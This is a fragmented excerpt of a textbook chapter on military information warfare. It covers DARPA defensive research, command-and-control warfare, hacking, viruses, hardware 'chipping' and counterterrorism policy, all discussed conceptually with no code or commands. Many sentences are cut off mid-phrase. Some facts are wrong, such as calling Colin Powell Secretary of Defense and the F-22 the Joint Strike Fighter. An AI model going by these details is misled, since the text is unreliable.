Ironclad ebusiness Privacy Plan, McGraw-Hill, New York, 2001
...
, High-Speed Cisco Networks: Planning, Design, and Implementation, CRC Press, Boca Raton, FL, 2002
...
, The Cabling Handbook, 2nd ed
...

[6] Vacca, John R
...


14

The Information Warfare
Arsenal and Tactics
of the Military

he growing reliance on computer networks makes the networks themselves
likely sites for attack
...
S
...
Current efforts include software agent–based systems (for real-time detection and recovery from a
cyberattack) and network-level early-warning systems (for monitoring suspicious
online activity)
...
S
...
With all
the fervor of their comrades in arms, computer-savvy patriots on both sides have
managed to infiltrate and disable enemy Web servers
...
The electron is the ultimate precision-guided weapon
...
In the very worst case (what
some have termed an electronic Pearl Harbor) a sudden, all-out network assault
would knock out communications as well as financial, power, transportation, military, and other critical infrastructures, resulting in total societal collapse
...
The advent of the
Internet means there really isn’t an outside anymore
...
Another concern is that the military’s push toward commercial off-the-shelf
technology is exposing vital networks to attack
...
), not in Washington, D
...

Military networks tend to be favored targets for hackers
...
Annoying and costly as that
may be, it’s not the chief worry
...
The Pentagon’s primary concern is the government that’s
prepared to invest heavily in coordinated strategic attacks on U
...
military and
civilian networks
...

For the information warrior, the basic issues are protecting oneself from attack,
identifying the attacker, and then responding
...
Here, commercial firms have led the way, producing a
host of off-the-shelf hardware, software, and services, from firewalls [1] to intrusion
sensors to encryption schemes
...

The U
...
military is generally regarded as being farthest along in its IW preparedness
...
A further
recognition has been that simply trying to “keep the bad guys out” is futile
...

Nowadays the focus is on keeping so-called mission-critical networks up and
running and detecting intruders early on, before any real harm is done
...
A system administrator typically only has local knowledge of the health of his own system
...
Achieving such a network-wide perspective is the
aim of Cyberpanel, a new Defense Advanced Research Projects Agency (DARPA)
program, as discussed in Sidebar, “Renegotiating the Human–Machine Interface
...
S
...
The work at the DARPA ITS office is defensive,
rather than offensive, in nature
...

Historically, DARPA not only was significant in generating technologies such as
the Internet, but also in developing methods for protecting these systems
...
DARPA spent the
early to mid-1990s patching the holes in these initial systems
...

One problem is that DARPA is moving ground
...
In looking at the next-generation networks, they have to work iteratively
so that functionality and security are negotiated in tandem
...
Their attitude was, They fund this work,
which leads to commercial products, which the Department of Defense (DoD) then
buys, and that’s how they fulfill their defense mission
...

Thus, DARPA is now working with the Pacific Command, which covers about
53% of the earth’s surface
...
Nothing will test what they do more than that
...
Eventually, an all-optical network
might look like a telecommunications network with a single switch from one person
to you and with a central hub
...
Also, it is almost impossible to detect the connection, because the signal is highly multiplexed over several wavelengths
...
If DARPA can field these advanced systems for a DoD environment, which would involve about a hundred thousand nodes, they could be the
precursors of what will enter the commercial market
...
The defense analyst is not
only looking for needles in a haystack but also pieces of needles
...

Thus, DARPA has to start assigning to machines more of the job of searching
data, looking for associations, and then presenting to the analyst something he or she
can understand
...
It amplifies what the human is good at
...
So how does a machine understand a commander’s intent? To allow them to communicate, DARPA needs a machine
prosthesis to do the translation
...
Erroneous times and locations began showing
up on screen; planes needing refueling were sent to rendezvous with tankers that
never materialized, and one tanker was dispatched to two sites simultaneously
...

The DoD itself staged the attack as a simulation to demonstrate the first-ever
“real-time information recovery and response” during an IW attack
...


AGENT-BASED SYSTEMS
Software agents are defined very broadly: enabling real machine-to-machine communications, allowing machines to understand content, send messages, do negotiations, and so on
...
It’s aimed at semantic interoperability—to make more of what’s online
machine readable
...
You
can’t ask it to do a content-based search for you, because it can’t understand the
content
...
” The better
machines are at recognizing content, the more they can share content, and the more
agent-based systems can be built
...
Different communities have different terms for the
same thing, or the same term for different things
...
On the
current Web, you can’t search on one term and find the other
...
A famous failure of that system
is the U
...
bombing of the Chinese embassy in Kosovo
...
S
...


The Information Warfare Arsenal and Tactics of the Military

375

All that only works if DARPA’s systems, which were built by different people
speaking different languages and using different approaches, can be integrated
...
The ability to quickly throw together systems in a command center or on the battlefield is crucial
...


B ROAD A CADEMIC –I NDUSTRY –G OVERNMENT C OLLABORATIONS
In DAML, for example, DARPA is working very closely with the World Wide Web
Consortium
...
They’re making sure DARPA learns
from their experiences
...
One has to ensure the flow of information to the information warrior
...

New information technology will undoubtedly open up new attack routes,
alongside whatever desirable features it may offer
...

Jamming remains the tried-and-true mode of attack, but what if, instead of blocking signals, the enemy were to infiltrate communications links and send out false
data? Just detecting such a radio frequency (RF) attack is tricky
...
For example, Joint Tactical Radio System (JTRS) will support, in a single downstream box,
all the legacy waveforms and provide interoperability among all existing and envisioned tactical radios
...

Being computer-based, however, it introduces a whole new threat to radios
...
Given that you’re
able to determine the culprit, what is the appropriate response? Obviously, you’d
have one response for a teenage hacker at a university in the United States and quite
a different one for somebody abroad who is working for a government
...
It’s safe to assume, though, that the arsenal includes all the tactics

376

Computer Forensics, Second Edition

deployed by ordinary hackers (worms, viruses, trapdoors, logic bombs), as well
as surveillance technology for intelligence purposes
...
” The latter include lowerlevel strikes on specific targets carried out over months or years by, for example, an
insider whose cooperation has been volunteered, bought, or coerced by a foreign
state
...
Pulling off an electronic Pearl Harbor, on the other hand, would
mean not only bringing down vast and disparate networks, but also keeping them
down long enough to inflict real harm
...
Attacks on important,
highly visible sites (the NASDAQ, for example) might shake public confidence
...
Therefore, this type of attack is what the military is most vulnerable to, and should be
their greatest concern
...
Anyone still caught uttering “electronic Pearl Harbor” is either an ex-cold warrior trying to drum up antiterrorism funding through the clever use of propaganda
or a used-car salesman or white-collar crook of some type
...
Any time you institute a new technology, there
are going to be downsides
...

Thus, the way to have the positives and not the negatives is to attend to the safety
and security issues
...
If the national security of
the United States were really on the line, there’s a lot people could do that they
haven’t done yet
...

This is not to say that you shouldn’t have a few cops on the beat to keep an eye
out for anomalous online activity, but life is not risk-free
...


OVERVIEW OF MILITARY TACTICS
The planning, security, and intelligence considerations of military information
warfare tactics (MIWT) must be present in all aspects of the military information
operations (MIO) development process, as discussed in Chapter 13
...


The Information Warfare Arsenal and Tactics of the Military

377

Planning
MIWT operations, like most operations, can only be effective when adequate attention is given to the overall objective to which they are being applied
...
The main objective of planning is to
ensure that information operations within the MIWT environment are focussed on
the wider military strategies and, therefore, the security objectives of the nation
...

Security
Military operations are most effective when they surprise an enemy
...
This applies to the MIWT environment as much
as it does to any other discipline of warfare
...
The integrity of friendly software, hardware, communications, procedures, people, and strategies is an essential part of the MIWT
environment
...

Security measures for ITS must rely on one particular aspect of that system
...
These systems will alert users if infiltration into the system is suspected
...
Therefore, information security must address each of the elements of
the ITS, including the people
...
Information security
is a significant activity in the MIWT process
...

Intelligence
Intelligence provides IW practitioners with assessments of an enemy’s ITS and their
likely reactions, both human- and machine-directed, following the commencement of an information attack
...
Planning attacks against such systems requires refinement in response to such changes, often at the last minute and occasionally during an attack
...


378

Computer Forensics, Second Edition

OFFENSIVE RUINOUS IW TOOLS AND TACTICS
The U
...
military has a new mission: Be ready to launch an offensive ruinous cyberattack against potential adversaries, some of whom are stockpiling cyberweapons
...

A few of years ago, an order from the National Command Authority (backed
by President Bush and Secretary of Defense Colin Powell) instructed the military to
gear up to wage cyberwar
...

The military sees three emerging threats: ballistic missiles, cyberwarfare, and
space control
...
S
...
This strategy
would detail actions to be followed by the Unified Commanders in Chief (CINC)
if the president and the secretary of defense order a cyberstrike
...
S
...

The IW strategy is detailed in a defense plan called “OPLAN 3600
...

Other countries, including Russia, Israel, and China, are further along in building
their IW capabilities
...
The Chinese are already moving along with this
...
S
...
That’s one reason the U
...
Space Command is joining with the
FBI to build an IW strategy
...
The FBI will have to help determine if any cyberattack (see
sidebar, “Cyberoffense Mired in Cold War”) suffered by U
...
military or business
entities calls for a military or law enforcement response
...
The United States is still mired in a Cold War–era defense-spending mentality
...

The consequences of a cyberterrorist attack could be devastating
...

Without a clear-cut example of an electronic Pearl Harbor, where a surprise cyberattack cripples financial markets and other critical systems, it’s difficult to convince
top military and political leaders that IT research and development should be a bigger priority in the budget process
...
Although attacks historically have
been labeled as “nuisances,” that may not be the correct way to look at the problem
...
Part of the problem is that DoD remains committed to lobbying Congress
for money to pay for programs such as the F-22 Joint Strike Fighter instead of
increasing funding for IT programs
...
DoD’s assumptions about future budget gains are wrong
...
That type of investment would preclude the need to buy costly systems such
as the F-22
...
S
...
Usually, when a major crisis costs people a lot of
money, it leads to many visits to Capitol Hill and requests for help
...

Some experts have questioned the government’s liberal use of the term terrorism
to describe acts of mass disruption of the Internet
...
The United States is attempting to be proactive, but many believe
that the United States is going to get seriously nailed
...
However, one of the biggest challenges facing the nation, highlighted during the
love bug incident, remains convincing industry that security is as important as making money
...
It has to become part of the business case
...
It allows attacks from anywhere in the world
...
It could start across the
street but appear to be coming from China
...

A cyberattack can include espionage using computer networks
...
It’s serious enough that the FBI issued an alert about it to the U
...

Space Command, giving U
...
forces warning that the action on the cyber front
could affect them as well
...

The United States’ approach to C2W is comprehensive
...
Countries like Australia, however, like most non-superpower
nations of the world, will not be able to commit the substantial resources needed to
follow the American model
...

Command and control warfare (C2W) is the approach to military operations that
employs all measures (including but not limited to Electronic Warfare [EW], military deception, psychological operations [psyops], operations security, and targeting) in a deliberate and integrated manner, mutually supported by intelligence and
ITS, to disrupt or inhibit an adversary’s ability to command and control his or her
forces while protecting and enhancing our own
...
There are
five elements of C2W, covering both offensive and defensive applications:
Operations security
Military deception
Psychological operations

The Information Warfare Arsenal and Tactics of the Military

381

Electronic warfare
Targeting
Operations Security
Operations security (OPSEC) is a term that appears in many military documents in
almost as many contexts, with several apparently different meanings
...
It requires the employment of specialist equipment, including software, the adoption of suitable procedures, and most
important, the development of a pro-security organizational culture
...

By denying a potential enemy an understanding of the capabilities of friendly systems, possible hostile C2W will be more likely to miscalculate the friendly information capabilities and be ineffective
...
The objectives of employing military deception are to create a false deduction of friendly intentions, capabilities, or dispositions by the enemy
...
There is no
point to influencing a decision if, in the event of ambiguity, the decision maker
passes the decision to a higher authority
...

Psychological Operations
Psychological operations (psyops) are operations that are planned activities in
peace and war directed to enemy, friendly, and neutral audiences to influence attitudes and behavior affecting the achievement of political and military objectives
...
Psyops have been used throughout history to influence adversary leaders and groups
...

Electronic Warfare
Electronic warfare (EW) is the military action involving the use of electromagnetic
energy to determine, exploit, reduce, or prevent hostile use of the electromagnetic
spectrum
...


382

Computer Forensics, Second Edition

Targeting
Targeting is not just a process, nor is it just focused on destructive ends
...
There are many hard- and soft-kill
options available to a commander
...

Hard or soft destruction requires the capability to remove selected targets from
an enemy’s order of battle
...
Destruction
may be achieved by any arm of the military
...
This can be either a desirable or undesirable outcome, and so must be considered when strategies are being developed
...
Accordingly, even though it is often the
most effective method of demonstrating resolve, physical destruction is generally
used as a last resort
...

The Objective of C2W
Until the 1991 Gulf War, the C2W elements had rarely been used in conjunction
with each other to specifically target an enemy’s ability to command and control its
forces
...

The ultimate objective of C2W is to decapitate the enemy’s command structure
from its body of combat forces while ensuring the integrity of friendly C2 systems
...
C2W activities are designed to
lift the fog of war for friendly forces while thickening the fog for the enemy
...
Therefore, the aim of C2W is to gain, maintain, or widen a gap
in the effectiveness of C2 in favor of friendly forces throughout a campaign and
particularly at decisive points in a battle
...
The concept of the OODA loop has its

The Information Warfare Arsenal and Tactics of the Military

383

origins in the Korean War, where an American pilot identified the advantages of
having good visibility and sensitive controls on board the U
...
Sabre jet fighters
...
The U
...
pilots simply had a shorter total period
between observing an event, orientating themselves to the possible ramifications
of the event, making a decision, and acting
...
Since the inception of air-to-air combat, staying inside the
enemy’s decision loop has been a consistent objective
...

The OODA loop concept is now applied to most aspects of modern warfare,
from land maneuvers to strategic missile developments
...
Those who are quick to observe an opportunity, recognize the opportunity, and exploit the opportunity are more frequently the successful or victorious business persons
...
Successful C2W operations will, therefore, increase the enemy’s decision
cycle (his or her OODA loop) to such a point that he or she will become increasingly vulnerable to attack
...
Even before the war had commenced, EW, psyops, and deception were employed to influence the Iraqi people and hierarchy
...
The Iraqi air defense system was virtually shut down by coalition activity within hours of the commencement of Operation Desert Storm
...
Shutting such an extensive system down with apparent ease
was a significant achievement and the result of a calculated offensive involving all
of the C2W elements
...
In
turn, this supremacy significantly reduced the potential for coalition air fatalities
and allowed the coalition air forces to strike Iraqi ground targets almost at will
...

In the 2003 Operation Iraqi Freedom, defense of friendly C2 systems and attacks on enemy systems were of paramount importance
...
A confused army leads to
another’s victory
...

The DoD has developed a policy that mandates the use of intrusion detection systems in all military networks
...
Roughly
15% of DoD networks, such as satellite links, are considered mission-critical
...

Thus, the Defense Information Systems Agency (DISA) is responsible for defining
the intrusion detection plan
...

The military helped pioneer intrusion detection systems by building its own
software from scratch in 1996
...
Today, still only a small percentage of the military’s
overall networked systems are guarded by any form of intrusion detection
...

Some defense-related agencies, such as the secretive NSA in Fort Meade, Maryland, already require round-the-clock monitoring of computer hosts and networks
...
In the Defense Intelligence Agency, it’s
the same sort of situation
...
In addition, intrusion detection software can record “false
positives,” a false alarm about trouble, and software occasionally needs to be finetuned to work correctly
...

Not all attempts by the federal government to put large-scale intrusion detection systems in place have succeeded
...
FIDNet, as it was called, was envisioned by the White House as a government-wide intrusion detection network to

The Information Warfare Arsenal and Tactics of the Military

385

monitor activities across civilian and defense networks
...
Although the General Services Administration (GSA) issued a draft RFP for FIDNet, GSA indicates
the idea has been shelved
...
They’ve opted not to go with managed security
...
Therefore, any organization that wants to take advantage of managed security services has to share detailed knowledge about its operations so that intrusion detection systems can be
properly used
...
The deputy secretary of defense approved a plan that would establish five joint reserve virtual information operations (JRVIO) and information
assurance organizations
...

Information operations has emerged as an area that is extremely well suited to
the integration of reserve capabilities
...

The DoD has long been battling a high-tech brain drain spurred by a booming economy and the lure of higher-paying jobs in the private sector
...
At the
same time, the Pentagon is facing an increase in cyberattacks and intrusions and
has increased its focus on using cybertactics to fight future conflicts
...
S
...

The Pentagon expects 526 reserve officers and enlisted personnel to staff the
five JRVIOs during fiscal 2005 and 2006 in Maryland, Virginia, and Texas
...

The initiative is a result of a two-year Pentagon study called “Reserve Component
Employment 2006
...
The study also urged the department to recruit
high-tech-savvy people from the private sector
...
Computers and associated technology have
helped change the face of modern information warfare tactics by providing the capabilities to generate and process massive amounts of data and disseminate the resultant information throughout the battlespace
...
They may also be used as weapons
in their own right
...
These techniques are primarily aimed at targeting the enemy’s broad information environment
...
Although generally strategic in nature,
computer operations may be applied to the tactical and operational components of
the conventional warfare environment, either in support of C2W operations or in
direct support of air, land, or sea operations
...
Someone who uses a computer to
rob a bank is a criminal, not a hacker
...

Unfortunately, exploring today’s computer science often means entering other
people’s systems
...
Most simply gain access to the systems,
snoop around for a while, and leave
...
A few like to exploit these systems for either their own gain or simply to
make life difficult for the users of that system
...
However,
most users of systems understandably find it an unacceptable invasion of their privacy to have people intruding into their systems
...
Hackers have historically found the challenge of breaking

The Information Warfare Arsenal and Tactics of the Military

387

into so-called secure military systems one of the more satisfying aspects of their
hobby
...

Once access is gained into a system, hackers can generally manipulate whatever
files they wish
...
A hacker can, of course, collect very important
information
...
In the government service domain, sensitive personal information
can be obtained (or altered), which can later be used against individuals
...
A hacker can also change the file
structure, amend the logic flow, and even destroy parts of the system
...
There have been several reports about government
sponsorship of such activity
...
The basic tool
kit of today’s industrial spy consists of a PC and a modem
...
Neither domestic nor international laws adequately address all of the issues surrounding hacking
...

The impact on those involved in developing MIWT is that hacking presents a
genuine threat to the security and integrity of both military and civilian information systems
...
Most
defensive strategies are system dependent; therefore, listing them in this chapter
would be pointless
...

The other reason national security forces should become involved in hacking is
the potential benefits that can be derived by employing hacking techniques as an offensive tactic
...
In future wars, information derived from hacking will form a large part of intelligence databases and, thus,
manipulation of the enemy’s decision-making support systems will become routine
...
A virus executes only when its host program begins to run
...
Protecting

388

Computer Forensics, Second Edition

against computer viruses has become a part of using modern ITS
...
Although statistics concerning
viruses are often difficult to substantiate, some specialists estimate that there are
as many as 11,233 viruses currently existing on the Internet, with cures being
available for only 4,583
...
The most effective method of minimizing the risk of virus attack and minimizing the damage caused by viruses in the event of an attack, is by employing
sound and rigorous information-management procedures
...
The use of the
most recent anti-virus software and the screening of disks every time they are placed
in a computer will reduce the risk of disk infections being passed onto systems
...
Viruses, however, can also be backed up, and a dormant virus can infest any
backup files and can be reintroduced when a system is recovered
...
Anti-virus strategies are aimed at minimizing the
chances of getting a virus and minimizing the damage that viruses can cause if they
are introduced
...
Simple procedures will often be enough to avoid viruses, but a single failure to comply with
anti-virus procedures can result in systems becoming inoperable
...
If a simple
virus can be injected into the systems of a potential enemy, the need to expend effort in physically attacking that system may be eliminated
...
Few, however, are aware of the risk to the essential hardware components of an ITS
...
Today’s chips contain billions of integrated circuits that can easily
be configured by the manufacturer to initiate unexpected events at a specific time or
at the occurrence of specific circumstances
...
There is almost no way of detecting whether a chip contained within a piece of equipment has been corrupted
...
Economically,
this is often not feasible
...
Establishing an indigenous manufacturing capability would increase the cost of acquiring the
equipment
...

Chipping represents a simple way to develop a conventional military advantage
by those countries that regularly export military equipment
...
This makes economic as well
as military sense
...

Many other computer weapons can be used in conjunction with or instead of
chipping, viruses, and hacking
...
They are all examples of computer operations that
may be adapted to suit the IW environment
...
Suffice to say that computer
weapons should be an integral part of any IW operations strategy
...


COUNTERING SUSTAINED TERRORIST IW TACTICS
Terrorism is, among other things, a weapon used by the weak against the strong
...
Terrorism will accompany changes at each of these levels, as it has in
other periods of flux in the international environment
...
S
...
The United States will also have a
unique, systemic interest in terrorism as a global problem (including acts of domestic terrorism confined within state borders, which make up the bulk of terrorism worldwide) even where the United States is not directly or even indirectly

390

Computer Forensics, Second Edition

targeted
...

Many of the United States’ high-priority national objectives have been shaken
by the recent experience of terrorism
...
Attacks against U
...
forces in Saudi Arabia raise questions
about the United States’ strategy for presence and stability in an area of critical importance for world energy supply
...
S
...
S
...
Cole in Yemen raise questions about the exposure
that comes with active engagement in world affairs and point to the risks of privately sponsored terrorism
...
S
...
Elsewhere, terrorism has destabilized allies
(in Saudi Arabia, Egypt, and Turkey) and has rendered counternarcotics relationships difficult (in Colombia and Mexico)
...

Overall Observations
Most contemporary analyses of terrorism focus on terrorist political violence as a
stand-alone phenomenon, without reference to its geopolitical and strategic context
...
Prior to the specter of superterrorism, using weapons of
mass destruction, terrorism, however horrible, never posed a threat to U
...
security
...
However, many types of terrorism do pose a threat to U
...
interests, from
homeland defense to regional security and the stability of the international system
...
S
...
S
...
In light of the preceding IW arsenal and tactics analysis of the military, certain overall sustained terrorist IW tactics observations stand out:
Terrorism
Geopolitics of terrorism
Counterterrorism versus new terrorism

The Information Warfare Arsenal and Tactics of the Military

391

U
...
Exposure
Comprehensive counterterrorism strategy
Terrorism

Terrorism is becoming a more diverse and lethal problem
...
For a variety of reasons, primarily the rise of religious
cults with transcendent agendas, but also the hardening of established political
groups, terrorism has become more lethal
...

Geopolitics of Terrorism

The geopolitics of terrorism are changing
...
S
...
The Balkans, the
former Soviet Union, and Latin America are set to emerge as significant sources of
terrorism aimed at or affecting U
...
civilian and military activities
...
More anarchic futures in the third world could fuel this type of terrorism, threatening America’s systemic interests as a global power and placing
constraints on the United States’ international engagement
...
Many established images of counterterrorism policy, especially the use of
force against state sponsors, are losing their relevance as traditional forms of terrorist behavior and organization (largely a product of the ideological and national
liberation movements of the 1960s–1980s) give way to new patterns
...
It is therefore more lethal
...
The absence of clear-cut sponsorship, above all,
will complicate the task of deterrence and response
...

U
...
Exposure

Foreign experts see U
...
exposure increasing but view the problem in narrower
terms
...
S
...
S
...
Policy makers and observers in these allied countries are not surprisingly focused on specific
national risks, few of which are analogous to risks facing the United States at home
and abroad
...
Notably, experts in all three countries share a degree of
skepticism about technology as a solution in counterterrorism
...
Treating terrorism as one of many national security challenges suggests a multidimensional approach
...
The environmentshaping aspect aims to create conditions for successfully managing terrorist risks,
making terrorism more transparent, shrinking “zones of chaos,” harnessing key
alliances to the counterterrorism effort, reducing U
...
exposure, and cutting off
terrorism’s resources
...

Implications for Military Strategy and the U
...
Air Force
In many instances, air and space power will not be the best instruments in the U
...

counterterrorism arsenal, and air power will rarely be used independently against
terrorism
...
There will also be instances, as in the past, where air and space power will be
instruments of choice in the fight against terrorism
...

Events in Sigonella (Sicily) and Afghanistan as well as Operation El Dorado
Canyon may be key models for the future
...
Deterrence and response will likely evolve in the direction of a more “personalized” approach, emphasizing the monitoring and attack of key nodes in terrorist networks and the forcible apprehension of terrorist suspects—with or without
the cooperation of local states
...


The Information Warfare Arsenal and Tactics of the Military

393

Air and space power will help make terrorism (an inherently amorphous phenomenon) more transparent
...
As terrorism becomes more diffuse and its sponsorship increasingly hazy, finding the
“smoking gun” will become more difficult but essential to determine strategies and
build a consensus for action
...

Gaining leverage in addressing the new terrorism will be a key strategic and
technical challenge
...
At the same time, policy instruments, including
air and space power, will need to concentrate on detecting and preventing the use of
weapons of mass destruction by terrorists—whether as a stand-alone apocalyptic act
or as a low-tech delivery system in the hands of adversaries
...
Terrorism is increasingly an urban
phenomenon worldwide
...
Terrorists seeking to influence political conditions have many incentives to attack urban targets
...
The use of air power in a counterterrorist mode introduces the
more general problem of operating in an urban environment (the difficult Israeli
experience in Beirut and South Lebanon is instructive)
...
Operations against them or to rescue
hostages will pose severe challenges for the use of air power, not least the risk of
placing uninvolved civilians in harm’s way
...

Air power’s pervasiveness and speed are advantages in the face of transnational
and transregional terrorism
...
Where terrorists and their sponsors can be identified and attacked with purpose, the global sight and reach of airand space-based assets will be valuable to national decision makers
...
Air and space power can be used in concert with covert action, diplomacy, economic instruments, and joint military operations
...
Operations using a range of instruments
can be designed to act, in parallel, on terrorist supporters, terrorist infrastructure
and networks, and the terrorists themselves
...
The collapse of the Soviet bloc and
the end of its covert funding and encouragement of terrorism led to a decline in the
militant and violent left-wing terrorist groups that were a feature of the age
...
This is not to say that state-backed terrorism has ceased, but
rather that the spectrum of terrorism has widened
...
The new terrorism may seek out military or government
targets, but it also seeks out symbolic civilian targets, and the victims have mostly
been innocent civilians (Alfred P
...

Growing concern about this new terrorism has been paralleled by concern about
the employment of the new information and communication technologies (ICTs)
...
They allow the diffusion of C2, they allow boundless new opportunities for communication, and they
allow the players to target the information stores, processes, and communications of
their opponents
...

The use of ICTs to influence, modify, disrupt, or damage a nation-state, its institutions, or population by influencing the media or by subversion has been called
“netwar
...
What particularly distinguishes netwar from other forms
of war is that it targets information and communications and may be used to alter
thinking or disrupt planned actions
...

Netwar is therefore of particular interest to those engaged in nonmilitary war
and those operating at the sub-state level
...

So far, however, it appears to be of greater interest to extremist advocacy groups
and terrorists
...
The

The Information Warfare Arsenal and Tactics of the Military

395

growth of such groups, and their growing powers in relation to those of nationstates, suggests an evolving power-based relationship for both
...

Most modern adversaries of nation-states, in the realm of low-intensity conflict—such as international terrorists, single-issue extremists, and ethnic and religious extremists—are organized in networks, although their leadership may
sometimes be hierarchical
...
Their doctrine, training, and modus operandi have, all
too often, been predicated on combating a hierarchy of command like their own
...
The
Tokyo subway attack by the Aum Shinriko, the Oklahoma City bombing and the
9-11 terrorist attacks, would have been unthinkable a generation ago
...

Cyberspace is becoming a new arena for political extremists: the potential for
physical conflict to be replaced by attacks on information infrastructures has
caused states to rethink their concepts of warfare, threats, and national assets at a
time when information is recognized as a national asset
...

Also, the arrival of the Internet has provided the first forum in history for all the
disaffected to gather in one place to exchange views and reinforce prejudices
...

Preeminent among the extremists and terrorist groupings who have entered cyberspace faster and more enthusiastically than others, are the far right, that is white
supremacists and neo-Nazis and radical Islamists
...

What characterizes these two groups are their transnational natures
...
The Islamist diaspora, now spread worldwide, seeks a return to divine-ruled states (or even one transnational state) in which all Muslims will

396

Computer Forensics, Second Edition

live under the norms and laws of the Saudi Arabian peninsula in the first and second
centuries of the Common Era
...
Their ideas and their use of cyberspace will
be further discussed in Chapter 15
...
This clearly reflects the more widespread ICT access in North America
...

One observer noted that the Internet has not replaced other communication
media for the far right and that its largest use in this regard has been to advertise the
sale of non-Internet-related propaganda, such as books, audiotapes, and videos
...
The Seattle-based Coalition
For Human Dignity observed that far right events in the United States, which were
heavily promoted on the Internet only, were failures
...

Surfing the Net has replaced real action
...
S
...

Not only do individuals want risk-free revolution, they now want people-free revolution
...
It allows
individuals to spend their lives interacting with a machine rather than with people
...
Unless law enforcement and national security agencies can
move quickly, they will leave national infrastructures defenseless
...

Therefore, what is significant for the far right and its use of the Internet is that
it possesses the potential to offer the relatively small numbers of people involved a
means to communicate, develop a sense of common purpose, and create a virtual
home symbolically
...
These
properties make it uniquely suitable for maintaining relationships among groups
that are prone to attrition, because forms of association can be established at a social and geographical distance
...
What is apparent, however, is that
warfare is shifting toward attacking civilian targets and that sub-state terrorists and
other extremists are increasingly targeting civilian infrastructures
...
It is there-

The Information Warfare Arsenal and Tactics of the Military

397

fore the civilian infrastructure that is the most vulnerable; the military can protect
its own infrastructure, despite media reports that it is vulnerable and a constant victim of hacking
...
There is only a
global information infrastructure
...
This is true because there is no way to sever the United States from
the information infrastructure that connects the rest of the world
...
S
...
It is just as easy now to engage in a cyberattack from Tehran as it is from Pomeroy, Ohio
...
Rogue IW offers combatants the ability to
execute asymmetrical attacks that have nonlinear effects against an adversary
...
Furthermore, rogue IW offers
weaker enemies (even at the sub-state level) a strategic alternative to attrition—an
attractive feature, especially when facing an opponent with significantly stronger
conventional forces
...
S
...
Targets of such attacks might include C2 networks,
satellite systems [5], and even the power grids of the continental United States
...

In contrast, terrorism has been used by states and sub-state groups for millennia
...
The intended target of a terrorist act goes beyond the immediate victims
...
The United States experienced a tragic example of
this effect in the 1983 bombing of the U
...
Marine barracks in Beirut, the USS Cole
in Yemen in 2000, and the 9-11-2001 terrorist attacks, where a small terrorist
group, clearly weaker than the U
...
military, nevertheless executed an effective
strategic attack against the United States
...
The capabilities are out there already; they just are not being tapped
...
The problem of terrorism, on the other hand, has been in the
headlines and in the social consciousness for decades, especially since the technological advance of intercontinental flight
...
If comparisons are substantiated as more than circumstantial, then the lessons
that might be applied to rogue IW defense from successes and failures of 33 years
of countering terrorism should be examined closely
...

The bombing of the Murrah Building in Oklahoma City and the 9-11 terrorist
attacks were two of many major events to remind the military that the continental
United States no longer offers sanctuary from terrorism
...
The military should organize and prepare for potential rogue IW attacks against them without necessarily having a formal definition and without having to experience a massive
information attack
...
A wide-scale information attack could involve systems under the responsibility of agencies across
the government and even the commercial sector
...
In the case
of the Oklahoma City bombing, organizations such as Bureau of Alcohol, Tobacco,
and Firearms (ATF) and the FBI investigated the incident, and the Federal Emergency Management Agency (FEMA) responded with crisis mitigation using both
federal and local resources
...

Clearly, rogue IW defense will demand many resources throughout the federal
government
...
For example,
terrorism policies under President Reagan suggested that such an organized U
...

counterterrorism agency (whether newly created or placed within an existing
agency) would not have been feasible
...
Terrorism is a complex phenomenon requiring a comprehensive response
...
S
...
It would be difficult, if not impossible, to create a single department with

The Information Warfare Arsenal and Tactics of the Military

399

the needed jurisdiction to control the U
...
response to terrorism and would lead to
even greater policy and process problems
...

Furthermore, the distributed nature of the problem implies a distributed response
from the agencies owning the appropriate capabilities
...
An IW-D Oversight Office should be endowed with an independent budget and tasking authority
to coordinate the decision-making process, identify capabilities needed to respond,
and inform the agencies that own the capabilities as to their defensive rogue IW
roles
...
This
type of organization resembles, at a much broader range, the joint staff of the DoD,
but with a budget as well as tasking authority for IW-D
...

DoD has also articulated a similar concept for an office within the Executive
Office of the President, organized for countering terrorism, as a potential focal
point for the oversight of the U
...
antiterrorist program
...
It would see
that the necessary resources and capabilities are there when they are needed
...

An Executive IW-D Oversight Office would be in a prime position to identify
and coordinate the investigative agencies, defense organizations, and all elements of
the intelligence community that would be in positions to recognize and respond to
attack
...
Such an office should also interact
with the commercial sector, reflecting the extent to which commercial interests
would be affected in IW and the contribution industry can make to solutions
...

In addition to reorganizing the bureaucracy, an IW-D Oversight Office might
reorganize priorities
...
One-hundred percent protection of an infrastructure is virtually impossible
...
These capabilities are fundamental to any indications and warnings
system and are especially crucial in IW because protection is so fluid
...
A policy for public awareness and education in the event of an information crisis (regionally coordinated in an organization similar to FEMA) might stave off panic, alert the public to measures they could
take to assist, and lessen immediate public pressure on government officials to “do
something
...

The past 37 years have shown the United States the paradox that “lowintensity conflict” has posed to the world’s mightiest military power
...
As stated
in the beginning, analogies can be useful, but at a certain point, relying on them
for analysis becomes harmful
...
The unfortunate lesson of terrorism is that as
long as the United States is unwilling to cede their liberty to prevent violence,
there are no total solutions
...
IW has yet to emerge
from its dogmatic stage and still offers more slogans than lessons, yet in retrospect
of 37 years of fighting terrorism in a concentrated national and international effort,
it is unclear whether an electronic Pearl Harbor would elicit a federal response
other than the ad hoc overreactions and short-term task forces that have characterized U
...
counterterrorism policy
...
Preempting a
rogue IW attack with a multiagency policy of coordination could save the United
States from their adversaries, and it might even save them from themselves
...
Terrorism in the 1990s and the present time is no exception
...
Hamas’ and
Hezbollah’s stepped-up terrorism in Israel undoubtedly influenced the outcome
of Israeli elections, and it achieved its immediate objective of setting back the
peace process on which Palestine Authority President Yasser Arafat had gambled

The Information Warfare Arsenal and Tactics of the Military

401

his future
...

Terrorists caused disruption and destabilization in other parts of the world,
such as Sri Lanka, where economic decline has accompanied the war between the
government and the Tamil Tigers
...
Even in Algeria, where terrorism has exacted the highest toll in human
lives, Muslim extremists have made little headway since 1993, when many predicted the demise of the unpopular military regime
...
In those cases, however,
the terrorists had first forsworn violence and adjusted to the political process
...
That is true, but only where there is much inflammable material: as in Sarajevo in 1914, so in the Middle East and elsewhere today
...

Nevertheless, terrorism’s prospects, often overrated by the media, the public, and
some politicians, are improving as its destructive potential increases
...
The past few decades have witnessed the
birth of dozens of aggressive movements espousing varieties of nationalism, religious
fundamentalism, fascism, and apocalyptic millenarianism, from Hindu nationalists
in India to neofascists in Europe and the developing world, to the Branch Davidian
cult in Waco, Texas
...
Now, mail-order catalogs tempt militants with readily available, far
cheaper, unconventional as well as conventional weapons—the poor man’s nuclear
bomb, Iranian President Ali Akbar Hashemi Rafsanjani called them
...
